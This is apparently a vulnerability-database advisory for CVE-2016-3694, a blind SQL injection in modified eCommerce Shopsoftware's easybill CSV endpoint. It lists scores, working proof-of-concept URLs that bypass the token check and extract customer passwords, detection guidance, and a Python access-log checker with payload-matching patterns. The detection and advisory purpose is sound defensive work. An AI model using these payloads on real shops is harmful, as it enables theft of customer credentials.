CVE-2016-3694
Published 2017-02-15
Priority: P2 (69) · Critical 9.8 (CVSS 3.0) · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available · EPSS 3.73% (88.5th percentile)
Multiple SQL injection vulnerabilities in modified eCommerce Shopsoftware 2.0.0.0 revision 9678, when the easybill-module is not installed, allow remote attackers to execute arbitrary SQL commands via the (1) orders_status or (2) customers_status parameter to api/easybill/easybillcsv.php.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| modified | ecommerce_shopsoftware | — | — |
Detection & IOCs (extracted from sources)
- URL (PoC, time-based sleep probe): http://127.0.0.1/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or-sleep(5)/*&customers_status=*/%23
- URL (PoC, blind character-by-character extraction of customers_password): http://127.0.0.1/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or(Select(case(36)when(ascii(substring(`customers_password`FROM(1)FOR(1))))then-sleep(5)End)from`customers`where`customers_id`=1)/*&customers_status=*/%23
- Detect unauthenticated GET requests to /api/easybill/easybillcsv.php whose token parameter is the literal string 'MODULE_EASYBILL_CSV_CRON_TOKEN'. When the easybill module is not installed, that constant is undefined and the literal string passes the token check, so this alone is a bypass indicator.
- Monitor GET requests to easybillcsv.php for SQL injection payloads in the 'orders_status' or 'customers_status' parameters, in particular time-based blind injection keywords such as 'sleep' or the 'case/when/ascii/substring' combination, written with whitespace removed and commas replaced by the 'FROM(n)FOR(n)' form of SUBSTRING.
- Flag requests where 'orders_status' contains fragments like '))or-sleep(' or '))or(Select(case(' as time-based blind SQL injection attempts against this endpoint.
- Because the technique avoids whitespace and commas, rules that key on 'SELECT ' or ', ' will miss it; look instead for SQL keywords run together without spaces (e.g. 'FROM(1)FOR(1)', 'ascii(substring(') in query parameters.
- The authentication bypass (the literal string 'MODULE_EASYBILL_CSV_CRON_TOKEN' as the token value) only works when the easybill module is NOT installed. If the module is installed, the constant is defined and the bypass is ineffective.
- Union-based SQL injection is not possible because of the ORDER BY clause with explicit table references; exploitation is limited to blind (time-based) injection.
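As an added worked example (not from this page, the exploit author, or the modified eCommerce project), the detection hints above expressed as a small Python checker run over web-server access-log lines. The log lines, client IPs, timestamps and rule names are constructed for illustration; the two injection URIs are the PoC URLs listed above, and the token/path checks assume the request reaches the shop under a path ending in /api/easybill/easybillcsv.php.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Hypothetical detection rules for CVE-2016-3694 (example code, not vendor code).
TARGET_PATH = "/api/easybill/easybillcsv.php"
LITERAL_TOKEN = "MODULE_EASYBILL_CSV_CRON_TOKEN"   # undefined constant -> literal string when module absent
INJECTABLE_PARAMS = ("orders_status", "customers_status")

# Patterns are applied to the URL-decoded, lower-cased parameter value. They deliberately
# do not expect spaces or commas, because the published payloads avoid both.
SQLI_PATTERNS = [
    ("time_based_sleep", re.compile(r"\bsleep\s*\(|\bbenchmark\s*\(")),
    ("closing_then_or", re.compile(r"\)\)\s*or[\s(-]")),            # '))or-sleep(' / '))or(select('
    ("blind_char_compare", re.compile(r"case\(|ascii\(substring\(|\bwhen\(")),
    ("comma_less_substring", re.compile(r"from\(\d+\)for\(\d+\)")),  # SUBSTRING(x FROM 1 FOR 1) minus whitespace
]

# Apache/nginx "combined"-style access log line (constructed sample format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log: one benign call, one literal-token call, the two PoC URIs, one unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Feb/2017:10:01:02 +0000] "GET /shop/api/easybill/easybillcsv.php?token=7c1f2a9b&orders_status=1&customers_status=1 HTTP/1.1" 200 512
203.0.113.7 - - [15/Feb/2017:10:01:09 +0000] "GET /shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=1&customers_status=1 HTTP/1.1" 200 512
198.51.100.23 - - [15/Feb/2017:10:02:30 +0000] "GET /shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or-sleep(5)/*&customers_status=*/%23 HTTP/1.1" 200 88
198.51.100.23 - - [15/Feb/2017:10:02:41 +0000] "GET /shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or(Select(case(36)when(ascii(substring(`customers_password`FROM(1)FOR(1))))then-sleep(5)End)from`customers`where`customers_id`=1)/*&customers_status=*/%23 HTTP/1.1" 200 88
203.0.113.9 - - [15/Feb/2017:10:03:00 +0000] "GET /shop/product_info.php?products_id=12&sort=sleep HTTP/1.1" 200 9001
"""


def analyze_request(uri):
    """Return the list of rule names that fire for one request URI ([] if nothing matched)."""
    parts = urlsplit(uri)
    if not parts.path.endswith(TARGET_PATH):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    token = params.get("token", [""])[0]
    if unquote(token) == LITERAL_TOKEN:
        findings.append("literal_cron_token")
    for name in INJECTABLE_PARAMS:
        for raw in params.get(name, []):
            # parse_qs decoded once already; a second unquote catches double-encoded payloads.
            value = unquote(raw).lower()
            for label, pattern in SQLI_PATTERNS:
                if pattern.search(value):
                    findings.append(f"{name}:{label}")
    return findings


def scan_log(text):
    """Return [(line_no, client_ip, findings)] for every log line that triggered at least one rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_request(m["uri"])
        if findings:
            hits.append((n, m["ip"], findings))
    return hits


if __name__ == "__main__":
    for line_no, ip, findings in scan_log(SAMPLE_LOG):
        print(f"line {line_no} from {ip}: {', '.join(findings)}")
```

The literal-token rule is worth keeping even on shops where the module is installed and the bypass therefore fails: a client sending the constant's name as its value is running the public PoC, and the sleep/case patterns on lines 3 and 4 confirm the blind-extraction phase. The unrelated request with `sort=sleep` is not reported because the path check comes first; widen `TARGET_PATH` only if you want a generic time-based-SQLi rule.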
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
No detection rules found.
No writeups or analysis indexed.